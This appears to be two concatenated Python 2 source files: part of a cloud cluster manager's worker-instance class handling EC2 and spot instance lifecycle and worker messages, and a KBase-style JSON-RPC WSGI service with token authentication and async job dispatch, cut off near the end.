log.debug("'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(), instance_states.TERMINATED))
self._remove_instance()
elif state == instance_states.RUNNING:
log.debug("'Maintaining' instance {0} in '{1}' state (last comm before {2} | "
"last m_state change before {3} | time_rebooted before {4}"
.format(self.get_desc(), instance_states.RUNNING,
dt.timedelta(seconds=(Time.now() - self.last_comm).seconds),
dt.timedelta(seconds=(Time.now() - self.last_m_state_change).seconds),
dt.timedelta(seconds=(Time.now() - self.time_rebooted).seconds)))
if (Time.now() - self.last_comm).seconds > self.config.instance_comm_timeout and \
(Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
reboot_terminate_logic()
@TestFlag(None)
def get_cloud_instance_object(self, deep=False):
""" Get the instance object for this instance from the library used to
communicate with the cloud middleware. In the case of boto, this
is the boto EC2 Instance object.
:type deep: bool
:param deep: If True, force the check with the cloud middleware; else
use local field by default
:rtype: boto.ec2.instance.Instance (should really be a more generic repr
but we'll wait for OCCI or something)
:return: cloud instance object for this instance
"""
if deep is True: # reset the current local instance field
self.inst = None
if self.inst is None and self.id is not None:
try:
rs = self.app.cloud_interface.get_all_instances(self.id)
if len(rs) == 0:
log.warning("Instance {0} not found on the cloud?".format(
self.id))
for r in rs:
# Update local fields
self.inst = r.instances[0]
self.id = r.instances[0].id
self.m_state = r.instances[0].state
except EC2ResponseError, e:
log.error("Trouble getting the cloud instance ({0}) object: {1}".format(self.id, e))
except Exception, e:
log.error("Error getting the cloud instance ({0}) object: {1}".format(self.id, e))
elif not self.is_spot():
log.debug(
"Cannot get cloud instance object without an instance ID?")
return self.inst
def is_spot(self):
""" Test is this Instance is a Spot instance.
:rtype: bool
:return: True if the current Instance is Spot instance, False otherwise.
"""
return self.lifecycle == instance_lifecycle.SPOT
def spot_was_filled(self):
""" For Spot-based instances, test if the spot request has been
filled (ie, an instance was started)
:rtype: bool
:return: True if this is a Spot instance and the Spot request
is in state spot_states.ACTIVE. False otherwise.
"""
self.update_spot()
if self.is_spot() and self.spot_state == spot_states.ACTIVE:
return True
return False
def get_status_dict(self):
toret = {'id': self.id,
'alias': self.alias,
'ld': self.load,
'time_in_state': misc.formatSeconds(Time.now() - self.last_m_state_change),
'nfs_data': self.nfs_data,
'nfs_tools': self.nfs_tools,
'nfs_indices': self.nfs_indices,
'nfs_sge': self.nfs_sge,
'nfs_tfs': self.nfs_tfs,
'get_cert': self.get_cert,
'slurmd_running': self.slurmd_running,
'worker_status': self.worker_status,
'instance_state': self.m_state,
'instance_type': self.type,
'public_ip': self.public_ip}
if self.load:
lds = self.load.split(' ')
if len(lds) == 3:
toret['ld'] = "%s %s %s" % (float(lds[0]) / self.num_cpus, float(
lds[1]) / self.num_cpus, float(lds[2]) / self.num_cpus)
return toret
def get_status_array(self):
if self.m_state.lower() == "running": # For extra states.
if self.is_alive is not True:
ld = "Starting"
elif self.load:
lds = self.load.split(' ')
if len(lds) == 3:
try:
load1 = float(lds[0]) / self.num_cpus
load2 = float(lds[1]) / self.num_cpus
load3 = float(lds[2]) / self.num_cpus
ld = "%s %s %s" % (load1, load2, load3)
except Exception, e:
log.debug("Problems normalizing load: %s" % e)
ld = self.load
else:
ld = self.load
elif self.worker_status == "Ready":
ld = "Running"
return [self.id, ld, misc.formatSeconds(
Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices, self.nfs_sge, self.get_cert,
self.sge_started, self.worker_status]
else:
return [self.id, self.m_state,
misc.formatSeconds(Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices,
self.nfs_sge, self.get_cert, self.sge_started,
self.worker_status]
@TestFlag("TestInstanceID")
def get_id(self):
if self.inst is not None and self.id is None:
try:
self.inst.update()
self.id = self.inst.id
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
except Exception, e:
log.error("Exception retreiving instance object: %s" % e)
return self.id
def get_desc(self):
""" Get basic but descriptive info about this instance. Useful for logging.
"""
if self.is_spot() and not self.spot_was_filled():
return "'{sid}'".format(sid=self.spot_request_id)
# TODO : DO NOT redefine id, etc.
return "'{id}; {ip}; {sn}'".format(id=self.get_id(), ip=self.get_public_ip(),
sn=self.alias)
def reboot(self, count_reboot=True):
"""
Reboot this instance. If ``count_reboot`` is set, increment the number
of reboots for this instance (a treshold in this count leads to eventual
instance termination, see ``self.config.instance_reboot_attempts``).
"""
if self.inst is not None:
# Show reboot count only if this reboot counts toward the reboot quota
s = " (reboot #{0})".format(self.reboot_count + 1)
log.info("Rebooting instance {0}{1}.".format(self.get_desc(),
s if count_reboot else ''))
try:
self.inst.reboot()
self.time_rebooted = Time.now()
except EC2ResponseError, e:
log.error("Trouble rebooting instance {0}: {1}".format(self.get_desc(), e))
else:
log.debug("Attampted to reboot instance {0} but no instance object? "
"(doing nothing)".format(self.get_desc()))
if count_reboot:
# Increment irespective of success to allow for eventual termination
self.reboot_count += 1
log.debug("Incremented instance reboot count to {0} (out of {1})"
.format(self.reboot_count, self.config.instance_reboot_attempts))
def terminate(self):
self.worker_status = "Stopping"
t_thread = threading.Thread(target=self.__terminate)
t_thread.start()
return t_thread
def __terminate(self):
inst_terminated = self.app.cloud_interface.terminate_instance(
instance_id=self.id,
spot_request_id=self.spot_request_id if self.is_spot() else None)
self.terminate_attempt_count += 1
if inst_terminated is False:
log.error("Terminating instance %s did not go smoothly; instance state: '%s'"
% (self.get_desc(), self.get_m_state()))
else:
# Remove the reference to the instance object because with OpenStack &
# boto the instance.update() method returns the instance as being
# in 'running' state even though the instance does not even exist
# any more.
self.inst = None
self._remove_instance()
def _remove_instance(self, force=False):
""" A convenience method to remove the current instance from the list
of worker instances tracked by the master object.
:type force: bool
:param force: Indicate if the instance should be forcefully (ie, irrespective)
of other logic) removed from the list of instances maintained
by the master object.
"""
try:
if self in self.app.manager.worker_instances:
self.app.manager.worker_instances.remove(self)
log.info(
"Instance '%s' removed from the internal instance list." % self.id)
# If this was the last worker removed, add master back as execution host.
if len(self.app.manager.worker_instances) == 0 and not self.app.manager.master_exec_host:
self.app.manager.toggle_master_as_exec_host()
except ValueError, e:
log.warning("Instance '%s' no longer in instance list, the global monitor probably "
"picked it up and deleted it already: %s" % (self.id, e))
@TestFlag("running")
def get_m_state(self):
""" Update the machine state of the current instance by querying the
cloud middleware for the instance object itself (via the instance
id) and updating self.m_state field to match the state returned by
the cloud middleware.
Also, update local last_state_update timestamp.
:rtype: String
:return: the current state of the instance as obtained from the
cloud middleware
"""
self.last_state_update = Time.now()
self.get_cloud_instance_object(deep=True)
if self.inst:
try:
state = self.inst.state
log.debug("Requested instance {0} update: old state: {1}; new state: {2}"
.format(self.get_desc(), self.m_state, state))
if state != self.m_state:
self.m_state = state
self.last_m_state_change = Time.now()
except EC2ResponseError, e:
log.debug("Error updating instance {0} state: {1}".format(
self.get_id(), e))
self.m_state = instance_states.ERROR
else:
if not self.is_spot() or self.spot_was_filled():
log.debug("Instance object {0} not found during m_state update; "
"setting instance state to {1}".format(self.get_id(), instance_states.TERMINATED))
self.m_state = instance_states.TERMINATED
return self.m_state
@TestFlag(None)
def send_alive_request(self):
self.app.manager.console_monitor.conn.send('ALIVE_REQUEST', self.id)
def send_sync_etc_host(self, msg):
# Because the hosts file is synced over the transientFS, give the FS
# some time to become available before sending the msg
for i in range(3):
if int(self.nfs_tfs):
self.app.manager.console_monitor.conn.send('SYNC_ETC_HOSTS | ' + msg, self.id)
break
log.debug("Transient FS on instance {0} not available (code {1}); "
"waiting a bit...".format(self.get_desc(), self.nfs_tfs))
time.sleep(7)
def update_spot(self, force=False):
""" Get an update on the state of a Spot request. If the request has entered
spot_states.ACTIVE or spot_states.CANCELLED states, update the Instance
object itself otherwise just update state. The method will continue to poll
for an update until the spot request has been filled (ie, enters state
spot_states.ACTIVE). After that, simply return the spot state (see
force parameter).
:type force: bool
:param force: If True, poll for an update on the spot request,
irrespective of the stored spot request state.
"""
if self.is_spot() and (force or self.spot_state != spot_states.ACTIVE):
old_state = self.spot_state
try:
ec2_conn = self.app.cloud_interface.get_ec2_connection()
reqs = ec2_conn.get_all_spot_instance_requests(
request_ids=[self.spot_request_id])
for req in reqs:
self.spot_state = req.state
# Also update the worker_status because otherwise there's no
# single source to distinguish between simply an instance
# in Pending state and a Spot request
self.worker_status = self.spot_state
# If the state has changed, do a deeper update
if self.spot_state != old_state:
if self.spot_state == spot_states.CANCELLED:
# The request was canceled so remove this Instance
# object
log.info("Spot request {0} was canceled; removing Instance object {1}"
.format(self.spot_request_id, self.id))
self._remove_instance()
elif self.spot_state == spot_states.ACTIVE:
# We should have an instance now
self.id = req.instance_id
log.info("Spot request {0} filled with instance {1}"
.format(self.spot_request_id, self.id))
# Potentially give it a few seconds so everything gets registered
for i in range(3):
instance = self.get_cloud_instance_object()
if instance:
self.app.cloud_interface.add_tag(instance, 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(instance, 'role', 'worker')
self.app.cloud_interface.add_tag(instance, 'Name', "Worker: {0}".format(self.app.ud['cluster_name']))
break
time.sleep(5)
except EC2ResponseError, e:
log.error("Trouble retrieving spot request {0}: {1}".format(
self.spot_request_id, e))
return self.spot_state
@TestFlag("127.0.0.1")
def get_private_ip(self):
# log.debug("Getting instance '%s' private IP: '%s'" % ( self.id, self.private_ip ) )
if self.private_ip is None:
inst = self.get_cloud_instance_object()
if inst is not None:
try:
inst.update()
self.private_ip = inst.private_ip_address
except EC2ResponseError:
log.debug("private_ip_address for instance {0} not (yet?) available."
.format(self.get_id()))
else:
log.debug("private_ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.private_ip
@TestFlag('127.0.0.1')
def get_public_ip(self):
"""
Get the public IP address of this worker instance.
"""
if not self.public_ip:
inst = self.get_cloud_instance_object(deep=True)
# log.debug('Getting public IP for instance {0}'.format(inst.id))
if inst:
try:
inst.update()
self.public_ip = inst.ip_address
if self.public_ip:
log.debug("Got public IP for instance {0}: {1}".format(
self.get_id(), self.public_ip))
else:
log.debug("Still no public IP for instance {0}".format(
self.get_id()))
except EC2ResponseError:
log.debug("ip_address for instance {0} not (yet?) available.".format(
self.get_id()))
else:
log.debug("ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.public_ip
def get_local_hostname(self):
return self.local_hostname
def send_mount_points(self):
mount_points = []
for fs in self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM):
if fs.nfs_fs:
fs_type = "nfs"
server = fs.nfs_fs.device
options = fs.nfs_fs.mount_options
elif fs.gluster_fs:
fs_type = "glusterfs"
server = fs.gluster_fs.device
options = fs.gluster_fs.mount_options
else:
fs_type = "nfs"
server = self.app.cloud_interface.get_private_ip()
options = None
mount_points.append(
{'fs_type': fs_type,
'server': server,
'mount_options': options,
'shared_mount_path': fs.get_details()['mount_point'],
'fs_name': fs.get_details()['name']})
jmp = json.dumps({'mount_points': mount_points})
self.app.manager.console_monitor.conn.send('MOUNT | %s' % jmp, self.id)
# log.debug("Sent mount points %s to worker %s" % (mount_points, self.id))
def send_master_pubkey(self):
# log.info("\tMT: Sending MASTER_PUBKEY message: %s" % self.app.manager.get_root_public_key() )
self.app.manager.console_monitor.conn.send('MASTER_PUBKEY | %s' % self.app.manager.get_root_public_key(), self.id)
log.debug("Sent master public key to worker instance '%s'." % self.id)
log.debug("\tMT: Message MASTER_PUBKEY %s sent to '%s'" % (self.app.manager.get_root_public_key(), self.id))
def send_start_slurmd(self):
log.debug("\tMT: Sending START_SLURMD message to instance {0}, named {1}"
.format(self.get_desc(), self.alias))
self.app.manager.console_monitor.conn.send('START_SLURMD | {0}'.format(
self.alias), self.id)
def send_start_sge(self):
log.debug("\tMT: Sending START_SGE message to instance '%s'" % self.id)
self.app.manager.console_monitor.conn.send('START_SGE', self.id)
def send_add_s3fs(self, bucket_name, svc_roles):
msg = 'ADDS3FS | {0} | {1}'.format(bucket_name, ServiceRole.to_string(svc_roles))
self._send_msg(msg)
def _send_msg(self, msg):
"""
An internal convenience method to log and send a message to the current instance.
"""
log.debug("\tMT: Sending message '{msg}' to instance {inst}".format(msg=msg, inst=self.id))
self.app.manager.console_monitor.conn.send(msg, self.id)
def handle_message(self, msg):
# log.debug( "Handling message: %s from %s" % ( msg, self.id ) )
self.is_alive = True
self.last_comm = Time.now()
# Transition from states to a particular response.
if self.app.manager.console_monitor.conn:
msg_type = msg.split(' | ')[0]
if msg_type == "ALIVE":
self.worker_status = "Starting"
log.info("Instance %s reported alive" % self.get_desc())
msp = msg.split(' | ')
self.private_ip = msp[1]
self.public_ip = msp[2]
self.zone = msp[3]
self.type = msp[4]
self.ami = msp[5]
try:
self.local_hostname = msp[6]
self.num_cpus = int(msp[7])
self.total_memory = int(msp[8])
except:
# Older versions of CloudMan did not pass this value so if the master
# and the worker are running 2 diff versions (can happen after an
# automatic update), don't crash here.
self.local_hostname = self.public_ip
log.debug("INSTANCE_ALIVE private_ip: %s public_ip: %s zone: %s type: %s AMI: %s hostname: %s, CPUs: %s"
% (self.private_ip, self.public_ip, self.zone,
self.type, self.ami, self.local_hostname,
self.num_cpus))
# Add instance IP/name to /etc/hosts
misc.add_to_etc_hosts(self.private_ip, [self.alias, self.local_hostname])
# Instance is alive and responding.
self.send_mount_points()
elif msg_type == "GET_MOUNTPOINTS":
self.send_mount_points()
elif msg_type == "MOUNT_DONE":
log.debug("Got MOUNT_DONE message")
self.send_master_pubkey()
# Add hostname to /etc/hosts (for SGE config)
if self.app.cloud_type in ('openstack', 'eucalyptus'):
hn2 = ''
if '.' in self.local_hostname:
hn2 = (self.local_hostname).split('.')[0]
worker_host_line = '{ip} {hn1} {hn2}\n'.format(ip=self.private_ip,
hn1=self.local_hostname,
hn2=hn2)
log.debug("worker_host_line: {0}".format(worker_host_line))
with open('/etc/hosts', 'r+') as f:
hosts = f.readlines()
if worker_host_line not in hosts:
log.debug("Adding worker {0} to /etc/hosts".format(
self.local_hostname))
f.write(worker_host_line)
if self.app.cloud_type == 'opennebula':
f = open("/etc/hosts", 'a')
f.write("%s\tworker-%s\n" % (self.private_ip, self.id))
f.close()
# log.debug("Update /etc/hosts through master")
# self.app.manager.update_etc_host()
elif msg_type == "WORKER_H_CERT":
log.debug("Got WORKER_H_CERT message")
self.is_alive = True # This is for the case that an existing worker is added to a new master.
self.app.manager.save_host_cert(msg.split(" | ")[1])
log.debug("Worker '%s' host certificate received and appended "
"to /root/.ssh/known_hosts" % self.id)
for job_manager_svc in self.app.manager.service_registry.active(
service_role=ServiceRole.JOB_MANAGER):
job_manager_svc.add_node(self)
# Instruct the worker to start appropriate job manager daemon
if ServiceRole.SLURMCTLD in job_manager_svc.svc_roles:
self.send_start_slurmd()
else:
self.send_start_sge()
else:
log.warning('Could not get a handle on job manager service to '
'add node {0}'.format(self.get_desc()))
# If there are any bucket-based FSs, tell the worker to add those
fss = self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM)
for fs in fss:
if len(fs.buckets) > 0:
for b in fs.buckets:
self.send_add_s3fs(b.bucket_name, fs.svc_roles)
log.info("Waiting on worker instance %s to configure itself." % self.get_desc())
elif msg_type == "NODE_READY":
self.worker_status = "Ready"
log.info("Instance %s ready" % self.get_desc())
# Make sure the instace is tagged (this is also necessary to do
# here for OpenStack because it does not allow tags to be added
# until an instance is 'running')
self.app.cloud_interface.add_tag(self.inst, 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(self.inst, 'role', 'worker')
self.app.cloud_interface.add_tag(self.inst, 'alias', self.alias)
self.app.cloud_interface.add_tag(self.inst, 'Name', "Worker: {0}".format(self.app.ud['cluster_name']))
self.app.manager.update_condor_host(self.public_ip)
elif msg_type == "NODE_STATUS":
# log.debug("Node {0} status message: {1}".format(self.get_desc(), msg))
if not self.worker_status == 'Stopping':
msplit = msg.split(' | ')
self.nfs_data = msplit[1]
self.nfs_tools = msplit[2] # Workers currently do not update this field
self.nfs_indices = msplit[3]
self.nfs_sge = msplit[4]
self.get_cert = msplit[5]
self.sge_started = msplit[6]
self.load = msplit[7]
self.worker_status = msplit[8]
self.nfs_tfs = msplit[9]
self.slurmd_running = msplit[10]
else:
log.debug("Worker {0} in state Stopping so not updating status"
.format(self.get_desc()))
elif msg_type == 'NODE_SHUTTING_DOWN':
msplit = msg.split(' | ')
self.worker_status = msplit[1]
else: # Catch-all condition
log.debug("Unknown Message: %s" % msg)
else:
log.error("Epic Failure, squeue not available?")
|
variationServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'variation'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from variation.variationImpl import variation
impl_variation = variation(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['variation.variation_example_method_async'] = ['variation', 'variation_example_method']
async_check_methods['variation.variation_example_method_check'] = ['variation', 'variation_example_method']
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'variation'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_variation.variation_example_method,
name='variation.variation_example_method',
types=[basestring])
self.method_authentication['variation.variation_example_method'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"variation but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
